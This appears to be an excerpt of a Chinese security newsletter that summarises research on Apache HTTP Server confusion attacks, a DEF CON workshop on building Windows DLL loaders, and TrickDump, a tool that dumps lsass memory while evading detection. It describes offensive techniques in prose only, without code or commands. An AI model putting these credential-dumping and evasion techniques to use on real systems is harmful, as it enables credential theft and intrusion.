	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Apache HTTP Server的模块化设计带来了安全风险：由于模块间对请求处理结构的理解不一致，攻击者可以利用这一点进行Confusion Attacks。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Filename Confusion攻击：模块间对<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">r-&gt;filename</code>的理解不一致，可以导致安全问题，例如通过<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">?</code>截断RewriteRule后面的路径或网址，或者误导RewriteFlag的设置。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DocumentRoot Confusion攻击：模块间对<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">DocumentRoot</code>的理解不一致，可以导致认证和访问控制绕过，例如利用Files语法和mod_proxy的交互。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Handler Confusion攻击：利用Apache HTTP Server从1996年开始就存在的技术债，如AddHandler和AddType的混淆使用，攻击者可以调用任意的模块处理器。</section></li></ul>
	<br/>
	<p>🏷️: 攻击, 服务器, 漏洞, Apache HTTP Server, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 深入探讨Windows DLL加载机制</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">这个网站的主要内容是关于Windows动态链接库（DLL）加载机制的深入研讨会，教授参与者如何构建自己的DLL加载器，并深入了解DLL加载过程中的内部结构和依赖解析。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=69fdb4e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPYEtqiaHcOfsiaL1ch4GZSGPH06kWOEicSSSd2BibyD74pZ926flWm2UWIA%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Defcon 32 研讨会：构建完美 DLL 加载器</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Defcon32 Workshop：打造完美的DLL加载器</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPu2ThHZyg3tNzPla1Pm7NnIfZN28hEUkbLwQkpRnkosPKvcxgbx1vsQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPu2ThHZyg3tNzPla1Pm7NnIfZN28hEUkbLwQkpRnkosPKvcxgbx1vsQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844185225114218"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows DLL加载机制是系统中的核心组件，对于安装、运行、使用或破解系统都至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DLL加载过程涉及复杂的内部结构和依赖解析，这些知识对于恶意软件开发者和安全研究人员都是宝贵的。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">构建自己的DLL加载器需要深入理解Windows内部和WIN32API，以及对C语言编程和逆向工程的熟练掌握。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">研讨会提供了详细的技术要求和目录结构，以便参与者能够有效地完成活动并学习构建DLL加载器的技能。</section></li></ul>
	<br/>
	<p>🏷️: Windows, DLL, 加载机制, 研讨会, 编程</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0c
			 TrickDump：无Minidump文件的lsass进程内存抓取工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">TrickDump 是一个允许在不生成 Minidump 文件的情况下，抓取 lsass 进程内存的工具，它生成三个 JSON 文件和一个包含内存区域转储的 zip 文件。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.2861111111111111" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=b159c841&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPgo69VtFHhXsy5HswA97wjF4oL0D4pM06icfnJgkBS9IHDszeJXXQYQQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.38726790450928383" data-w="754" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=aff15068&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPicuFevS4B2jGtC7wzSd7caOoASHdYWjzbNytekcqnvIZF9Ml4No3Lug%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.49132176234979974" data-w="749" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=1e12df70&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPCEgk6XfU05lasydcStTdMic7hTowR0qP8Yc6hp9GseWrjCtxx4rwtrA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TrickDump：无需生成内存转储文件即可转储 lsass</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TrickDump：无需生成内存转储文件即可转储 lsass</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPSJicmvwaaBFatSVxuTm7iaAen2brHBSOsmKxMaQ6tY4s7H8h2VD34Iuw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPSJicmvwaaBFatSVxuTm7iaAen2brHBSOsmKxMaQ6tY4s7H8h2VD34Iuw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844185225112458"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TrickDump 的设计目的是在不引起过多安全警报的情况下，安全地转储 lsass 进程的内存。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具的优势在于不会在磁盘、内存或网络流量中产生有效的 Minidump 文件，降低了被检测到的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">TrickDump 通过分离攻击步骤，使用三个独立的程序来执行不同的任务，进一步降低了被检测的可能性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该工具支持多种方法来覆盖 ntdll.dll 库，以防止 API 钩子的检测。</section></li></ul>
	<br/>
